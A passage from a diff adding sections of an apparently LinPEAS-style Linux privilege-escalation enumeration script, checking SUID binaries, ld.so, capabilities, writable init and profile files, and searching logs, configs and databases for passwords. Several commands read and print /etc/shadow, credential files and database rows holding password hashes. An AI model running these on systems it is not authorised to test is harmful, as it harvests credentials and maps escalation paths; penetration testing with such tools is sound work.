(Unknown SGID binary)" | sed -${E} "s,/.*,${SED_RED}," + printf $ITALIC + if [ "$STRINGS" ]; then + $STRINGS "$sname" | sort | uniq | while read sline; do + sline_first="`echo \"$sline\" | cut -d ' ' -f1`" + if [ "`echo \"$sline_first\" | grep -Ev \"$cfuncs\"`" ]; then + if [ "`echo \"$sline_first\" | grep \"/\"`" ] && [ -f "$sline_first" ]; then #If a path + if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline)\n" + fi + else #If not a path + if [ ${#sline_first} -gt 2 ] && [ "`command -v \"$sline_first\" 2>/dev/null | grep '/' `" ]; then #Check if existing binary + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline)\n" + fi + fi + fi + done + if [ "$TIMEOUT" ] && [ "$STRACE" ] && [ ! "$SUPERFAST" ]; then + printf $ITALIC + echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." + timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" + printf $NC + echo "" + fi + fi + fi + fi + fi + done; + echo "" + + ##-- IF) Misconfigured ld.so + print_2title "Checking misconfigurations of ld.so" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#ld-so" + printf $ITALIC"/etc/ld.so.conf\n"$NC; + cat /etc/ld.so.conf 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + cat /etc/ld.so.conf 2>/dev/null | while read l; do + if [ "`echo \"$l\" | grep include`" ]; then + ini_path="`echo \"$l\" | cut -d " " -f 2`" + fpath="`dirname \"$ini_path\"`" + if [ "`find \"$fpath\" -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find \"$fpath\" -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + printf $ITALIC"$fpath\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + for f in $fpath/*; do + printf $ITALIC" $f\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + cat "$f" | grep -v "^#" | sed -${E} "s,$ldsoconfdG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + done + fi + done + echo "" + + ##-- IF) Capabilities + print_2title "Capabilities" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities" + echo "Current capabilities:" + (capsh --print 2>/dev/null | grep "Current:" | sed -${E} "s,$capsB,${SED_RED_YELLOW}," ) || echo_not_found "capsh" + (cat "/proc/$$/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$$/status" + echo "" + echo "Shell capabilities:" + (capsh --decode=0x"`cat \"/proc/$PPID/status\" 2>/dev/null | grep \"CapEff\" | awk '{print $2}'`" 2>/dev/null) || echo_not_found "capsh" + (cat "/proc/$PPID/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$PPID/status" + echo "" + echo "Files with capabilities (limited to 50):" + getcap -r / 2>/dev/null | head -n 50 | while read cb; do + echo "$cb" | sed -${E} "s,$sudocapsB,${SED_RED}," | sed -${E} "s,$capsB,${SED_RED}," + if ! [ "$IAMROOT" ] && [ -w "`echo \"$cb\" | cut -d \" \" -f1`" ]; then + echo "$cb is writable" | sed -${E} "s,.*,${SED_RED}," + fi + done + echo "" + + ##-- IF) Users with capabilities + print_2title "Users with capabilities" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities" + if [ -f "/etc/security/capability.conf" ]; then + grep -v '^#\|none\|^$' /etc/security/capability.conf 2>/dev/null | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," + else echo_not_found "/etc/security/capability.conf" + fi + echo "" + + ##-- IF) Files with ACLs + print_2title "Files with ACLs (limited to 50)" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#acls" + ((getfacl -t -s -R -p /bin /etc $HOMESEARCH /opt /sbin /usr /tmp /root 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 50 | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," + echo "" + + ##-- IF) .sh files in PATH + print_2title ".sh files in path" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path" + echo $PATH | tr ":" "\n" | while read d; do + for f in `find "$d" -name "*.sh" 2>/dev/null`; do + if ! [ "$IAMROOT" ] && [ -O "$f" ]; then + echo "You own the script: $f" | sed -${E} "s,.*,${SED_RED}," + elif ! [ "$IAMROOT" ] && [ -w "$f" ]; then #If write permision, win found (no check exploits) + echo "You can write script: $f" | sed -${E} "s,.*,${SED_RED_YELLOW}," + else + echo $f | sed -${E} "s,$shscripsG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED},"; + fi + done + done + echo "" + + ##-- IF) Unexpected folders in / + print_2title "Unexpected in root" + if [ "$MACPEAS" ]; then + (find / -maxdepth 1 | grep -Ev "$commonrootdirsMacG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found + else + (find / -maxdepth 1 | grep -Ev "$commonrootdirsG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found + fi + echo "" + + ##-- IF) Files (scripts) in /etc/profile.d/ + print_2title "Files (scripts) in /etc/profile.d/" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#profiles-files" + if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS + (ls -la /etc/profile.d/ 2>/dev/null | sed -${E} "s,$profiledG,${SED_GREEN},") || echo_not_found "/etc/profile.d/" + if ! [ "$IAMROOT" ] && [ -w "/etc/profile" ]; then echo "You can modify /etc/profile" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/etc/profile.d/" ]; then echo "You have write privileges over /etc/profile.d/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "`find /etc/profile.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/profile.d/ '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + fi + echo "" + + ##-- IF) Files (scripts) in /etc/init.d/ + print_2title "Permissions in init, init.d, systemd, and rc.d" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d" + if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS + if ! [ "$IAMROOT" ] && [ -w "/etc/init/" ]; then echo "You have write privileges over /etc/init/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "`find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/etc/init.d/" ]; then echo "You have write privileges over /etc/init.d/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "`find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/etc/rc.d/init.d" ]; then echo "You have write privileges over /etc/rc.d/init.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "`find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/usr/local/etc/rc.d" ]; then echo "You have write privileges over /usr/local/etc/rc.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "`find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/etc/rc.d" ]; then echo "You have write privileges over /etc/rc.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "`find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/etc/systemd/" ]; then echo "You have write privileges over /etc/systemd/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "`find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/lib/systemd/" ]; then echo "You have write privileges over /lib/systemd/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "`find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + fi + echo "" + + ##-- IF) Hashes in passwd file + print_list "Hashes inside passwd file? ........... " + if [ "`grep -v '^[^:]*:[x\*\!]\|^#\|^$' /etc/passwd /etc/master.passwd /etc/group 2>/dev/null`" ]; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null | sed -${E} "s,.*,${SED_RED}," + else echo_no + fi + + ##-- IF) Writable in passwd file + print_list "Writable passwd file? ................ " + if [ -w "/etc/passwd" ]; then echo "/etc/passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," + elif [ -w "/etc/pwd.db" ]; then echo "/etc/pwd.db is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," + elif [ -w "/etc/master.passwd" ]; then echo "/etc/master.passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," + else echo_no + fi + + ##-- IF) Credentials in fstab + print_list "Credentials in fstab/mtab? ........... " + if [ "`grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null`" ]; then grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null | sed -${E} "s,.*,${SED_RED}," + else echo_no + fi + + ##-- IF) Read shadow files + print_list "Can I read shadow files? ............. " + if [ "`cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null`" ]; then cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null | sed -${E} "s,.*,${SED_RED}," + else echo_no + fi + + ##-- IF) Read opasswd file + print_list "Can I read opasswd file? ............. " + if [ -r "/etc/security/opasswd" ]; then cat /etc/security/opasswd 2>/dev/null || echo "" + else echo_no + fi + + ##-- IF) network-scripts + print_list "Can I write in network-scripts? ...... " + if ! [ "$IAMROOT" ] && [ -w "/etc/sysconfig/network-scripts/" ]; then echo "You have write privileges on /etc/sysconfig/network-scripts/" | sed -${E} "s,.*,${SED_RED_YELLOW}," + elif [ "`find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges on `find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null`" | sed -${E} "s,.*,${SED_RED_YELLOW}," + else echo_no + fi + + ##-- IF) Read root dir + print_list "Can I read root folder? .............. " + (ls -al /root/ 2>/dev/null | grep -vi "total 0") || echo_no + echo "" + + ##-- IF) Root files in home dirs + print_2title "Searching root files in home dirs (limit 30)" + (find $HOMESEARCH /Users -user root 2>/dev/null | head -n 30 | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${SED_RED},") || echo_not_found + echo "" + + ##-- IF) Others files in my dirs + if ! [ "$IAMROOT" ]; then + print_2title "Searching folders owned by me containing others files on it (limit 100)" + (find / -type d -user "$USER" ! -path "/proc/*" 2>/dev/null | head -n 100 | while read d; do find "$d" -maxdepth 1 ! -user "$USER" \( -type f -or -type d \) -exec dirname {} \; 2>/dev/null; done) | sort | uniq | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed "s,root,${C}[1;13m&${C}[0m,g" + echo "" + fi + + ##-- IF) Readable files belonging to root and not world readable + if ! [ "$IAMROOT" ]; then + print_2title "Readable files belonging to root and readable by me but not world readable" + (find / -type f -user root ! -perm -o=r 2>/dev/null | grep -v "\.journal" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null | sed -${E} "s,/.*,${SED_RED},"; fi; done) || echo_not_found + echo "" + fi + + ##-- IF) Modified interesting files into specific folders in the last 5mins + print_2title "Modified interesting files in the last 5mins (limit 100)" + find / -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" ! -path "/private/var/*" 2>/dev/null | grep -v "/linpeas" | head -n 100 | sed -${E} "s,$Wfolders,${SED_RED}," + echo "" + + ##-- IF) Writable log files + print_2title "Writable log files (logrotten) (limit 100)" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#logrotate-exploitation" + logrotate --version 2>/dev/null || echo_not_found "logrotate" + lastWlogFolder="ImPOsSiBleeElastWlogFolder" + logfind=`find / -type f -name "*.log" -o -name "*.log.*" 2>/dev/null | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 3){ print line_init; }; if (cont == "3"){print "#)You_can_write_more_log_files_inside_last_directory"}; pre=act}' | head -n 100` + printf "%s\n" "$logfind" | while read log; do + if ! [ "$IAMROOT" ] && [ "$log" ] && [ -w "$log" ] || ! [ "$IAMROOT" ] && [ "`echo \"$log\" | grep -E \"$Wfolders\"`" ]; then #Only print info if something interesting found + if [ "`echo \"$log\" | grep \"You_can_write_more_log_files_inside_last_directory\"`" ]; then printf $ITALIC"$log\n"$NC; + elif ! [ "$IAMROOT" ] && [ -w "$log" ] && [ "`command -v logrotate 2>/dev/null`" ] && [ "`logrotate --version 2>&1 | grep -E ' 1| 2| 3.1'`" ]; then printf "Writable:$RED $log\n"$NC; #Check vuln version of logrotate is used and print red in that case + elif ! [ "$IAMROOT" ] && [ -w "$log" ]; then echo "Writable: $log"; + elif ! [ "$IAMROOT" ] && [ "`echo \"$log\" | grep -E \"$Wfolders\"`" ] && [ "$log" ] && [ ! "$lastWlogFolder" == "$log" ]; then lastWlogFolder="$log"; echo "Writable folder: $log" | sed -${E} "s,$Wfolders,${SED_RED},g"; + fi + fi + done + + echo "" + + ##-- IF) Files inside my home + print_2title "Files inside $HOME (limit 20)" + (ls -la $HOME 2>/dev/null | head -n 23) || echo_not_found + echo "" + + ##-- IF) Files inside /home + print_2title "Files inside others home (limit 20)" + (find $HOMESEARCH /Users -type f 2>/dev/null | grep -v -i "/"$USER | head -n 20) || echo_not_found + echo "" + + ##-- IF) Mail applications + print_2title "Searching installed mail applications" + ls /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /etc 2>/dev/null | grep -Ewi "$mail_apps" + echo "" + + ##-- IF) Mails + print_2title "Mails (limit 50)" + (find /var/mail/ /var/spool/mail/ /private/var/mail -type f -ls 2>/dev/null | head -n 50 | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_RED},g" | sed "s,root,${SED_GREEN},g") || echo_not_found + echo "" + + ##-- IF) Backup folders + print_2title "Backup folders" + printf "%s\n" "$backup_folders" | while read b ; do + ls -ld "$b" 2> /dev/null | sed -${E} "s,backups|backup,${SED_RED},g"; + ls -l "$b" 2>/dev/null && echo "" + done + echo "" + + ##-- IF) Backup files + print_2title "Backup files (limited 100)" + backs=`find / -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bak\.*" -o -name "*\.bck" -o -name "*\.bck\.*" -o -name "*\.bk" -o -name "*\.bk\.*" -o -name "*\.old" -o -name "*\.old\.*" \) -not -path "/proc/*" 2>/dev/null` + printf "%s\n" "$backs" | head -n 100 | while read b ; do + if [ -r "$b" ]; then + ls -l "$b" | grep -Ev "$notBackup" | grep -Ev "$notExtensions" | sed -${E} "s,backup|bck|\.bak|\.old,${SED_RED},g"; + fi; + done + echo "" + + ##-- IF) DB files + print_2title "Searching tables inside readable .db/.sql/.sqlite files (limit 100)" + FILECMD="`command -v file 2>/dev/null`" + if [ "$PSTORAGE_DATABASE" ]; then + printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do + if [ "$FILECMD" ]; then + echo "Found: `file \"$f\"`" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; + else + echo "Found: $f" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; + fi + done + SQLITEPYTHON="" + printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do + if ([ -r "$f" ] && [ "$FILECMD" ] && [ "`file \"$f\" | grep -i sqlite`" ]) || ([ -r "$f" ] && [ ! "$FILECMD" ]); then #If readable and filecmd and sqlite, or readable and not filecmd + printf $GREEN" -> Extracting tables from$NC $f $DG(limit 20)\n"$NC + if [ "`command -v sqlite3 2>/dev/null`" ]; then + tables=`sqlite3 $f ".tables" 2>/dev/null` + #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" + elif [ "`command -v python 2>/dev/null`" ] || [ "`command -v python3 2>/dev/null`" ]; then + SQLITEPYTHON=`command -v python 2>/dev/null || command -v python3 2>/dev/null` + tables=`$SQLITEPYTHON -c "print('\n'.join([t[0] for t in __import__('sqlite3').connect('$f').cursor().execute('SELECT name FROM sqlite_master WHERE type=\'table\' and tbl_name NOT like \'sqlite_%\';').fetchall()]))" 2>/dev/null` + #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" + else + tables="" + fi + if [ "$tables" ]; then + printf "%s\n" "$tables" | while read t; do + columns="" + # Search for credentials inside the table using sqlite3 + if [ -z "$SQLITEPYTHON" ]; then + columns=`sqlite3 $f ".schema $t" 2>/dev/null | grep "CREATE TABLE"` + # Search for credentials inside the table using python + else + columns=`$SQLITEPYTHON -c "print(__import__('sqlite3').connect('$f').cursor().execute('SELECT sql FROM sqlite_master WHERE type!=\'meta\' AND sql NOT NULL AND name =\'$t\';').fetchall()[0][0])" 2>/dev/null` + fi + #Check found columns for interesting fields + INTCOLUMN=`echo "$columns" | grep -i "username\|passw\|credential\|email\|hash\|salt"` + if [ "$INTCOLUMN" ]; then + printf ${BLUE}" --> Found interesting column names in$NC $t $DG(output limit 10)\n"$NC | sed -${E} "s,user.*|credential.*,${SED_RED},g" + printf "$columns\n" | sed -${E} "s,username|passw|credential|email|hash|salt|$t,${SED_RED},g" + (sqlite3 $f "select * from $t" || $SQLITEPYTHON -c "print(', '.join([str(x) for x in __import__('sqlite3').connect('$f').cursor().execute('SELECT * FROM \'$t\';').fetchall()[0]]))") 2>/dev/null | head + fi + done + echo "" + fi + fi + done + fi + echo "" + + ##-- IF) Web files + print_2title "Web files?(output limit)" + ls -alhR /var/www/ 2>/dev/null | head + ls -alhR /srv/www/htdocs/ 2>/dev/null | head + ls -alhR /usr/local/www/apache22/data/ 2>/dev/null | head + ls -alhR /opt/lampp/htdocs/ 2>/dev/null | head + echo "" + + ##-- IF) All hidden files + print_2title "All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)" + find / -type f -iname ".*" ! -path "/sys/*" ! -path "/System/*" ! -path "/private/var/*" -exec ls -l {} \; 2>/dev/null | grep -Ev "$INT_HIDDEN_FILES" | grep -Ev "_history$|\.gitignore|.npmignore|\.listing|\.ignore|\.uuid|\.depend|\.placeholder|\.gitkeep|\.keep|\.keepme" | head -n 70 + echo "" + + ##-- IF) Readable files in /tmp, /var/tmp, bachups + print_2title "Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)" + filstmpback=`find /tmp /var/tmp /private/tmp /private/var/at/tmp /private/var/tmp $backup_folders_row -type f 2>/dev/null | head -n 70` + printf "%s\n" "$filstmpback" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null; fi; done + echo "" + + ##-- IF) Interesting writable files by ownership or all + if ! [ "$IAMROOT" ]; then + print_2title "Interesting writable files owned by me or writable by everyone (not in Home) (max 500)" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files" + #In the next file, you need to specify type "d" and "f" to avoid fake link files apparently writable by all + obmowbe=`find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500` + printf "%s\n" "$obmowbe" | while read entry; do + if [ "`echo \"$entry\" | grep \"You_can_write_even_more_files_inside_last_directory\"`" ]; then printf $ITALIC"$entry\n"$NC; + elif [ "`echo \"$entry\" | grep -E \"$writeVB\"`" ]; then + echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," + else + echo "$entry" | sed -${E} "s,$writeB,${SED_RED}," + fi + done + echo "" + fi + + ##-- IF) Interesting writable files by group + if ! [ "$IAMROOT" ]; then + print_2title "Interesting GROUP writable files (not in Home) (max 500)" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files" + for g in `groups`; do + printf " Group "$GREEN"$g:\n"$NC; + iwfbg=`find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500` + printf "%s\n" "$iwfbg" | while read entry; do + if [ "`echo \"$entry\" | grep \"You_can_write_even_more_files_inside_last_directory\"`" ]; then printf $ITALIC"$entry\n"$NC; + elif [ "`echo \"$entry\" | grep -E \"$writeVB\"`" ]; then + echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," + else + echo "$entry" | sed -${E} "s,$writeB,${SED_RED}," + fi + done + done + echo "" + fi + + ##-- IF) Passwords in config PHP files + print_2title "Searching passwords in config PHP files" + printf "%s\n" "$PSTORAGE_PHP_FILES" | while read c; do grep -EiI "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" $c 2>/dev/null | grep -Ev "function|password.*= ?\"\"|password.*= ?''" | sed '/^.\{150\}./d' | sort | uniq | sed -${E} "s,[pP][aA][sS][sS][wW]|[dD][bB]_[pP][aA][sS][sS],${SED_RED},g"; done + echo "" + + ##-- IF) TTY passwords + print_2title "Checking for TTY (sudo/su) passwords in audit logs" + aureport --tty 2>/dev/null | grep -E "su |sudo " | sed -${E} "s,su|sudo,${SED_RED},g" + find /var/log/ -type f -exec grep -RE 'comm="su"|comm="sudo"' '{}' \; 2>/dev/null | sed -${E} "s,\"su\"|\"sudo\",${SED_RED},g" | sed -${E} "s,data=.*,${SED_RED},g" + echo "" + + ##-- IF) IPs inside logs + print_2title "Finding IPs inside logs (limit 70)" + (find /var/log/ /private/var/log -type f -exec grep -R -a -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" "{}" \;) 2>/dev/null | grep -v "\.0\.\|:0\|\.0$" | sort | uniq -c | sort -r -n | head -n 70 + echo "" + + ##-- IF) Passwords inside logs + print_2title "Finding passwords inside logs (limit 70)" + (find /var/log/ /private/var/log -type f -exec grep -R -i "pwd\|passw" "{}" \;) 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | grep -v "File does not exist:\|script not found or unable to stat:\|\"GET /.*\" 404" | head -n 70 | sed -${E} "s,pwd|passw,${SED_RED}," + echo "" + + ##-- IF) Emails inside logs + print_2title "Finding emails inside logs (limit 70)" + (find /var/log/ /private/var/log -type f -exec grep -I -R -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" "{}" \;) 2>/dev/null | sort | uniq -c | sort -r -n | head -n 70 | sed -${E} "s,$knw_emails,${SED_GREEN},g" + echo "" + + ##-- IF) Passwords files in home + print_2title "Finding *password* or *credential* files in home (limit 70)" + (printf "%s\n" "$PSTORAGE_PASSWORD_FILES" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 3){ print line_init; } if (cont == "3"){print " #)There are more creds/passwds files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 70 | sed -${E} "s,password|credential,${SED_RED}," | sed "s,There are more creds/passwds files in the previous parent folder,${C}[3m&${C}[0m,") || echo_not_found + echo "" + + if ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then + ##-- IF) Find possible files with passwords + print_2title "Finding passwords inside key folders (limit 70) - only PHP files" + intpwdfiles=`timeout 150 grep -RiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" $HOMESEARCH /var/www /usr/local/www/ $backup_folders_row /tmp /etc /root /mnt /Users /private 2>/dev/null` + printf "%s\n" "$intpwdfiles" | grep -I ".php:" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g" + echo "" + + print_2title "Finding passwords inside key folders (limit 70) - no PHP files" + printf "%s\n" "$intpwdfiles" | grep -vI ".php:" | grep -E "^/" | grep ":" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g" 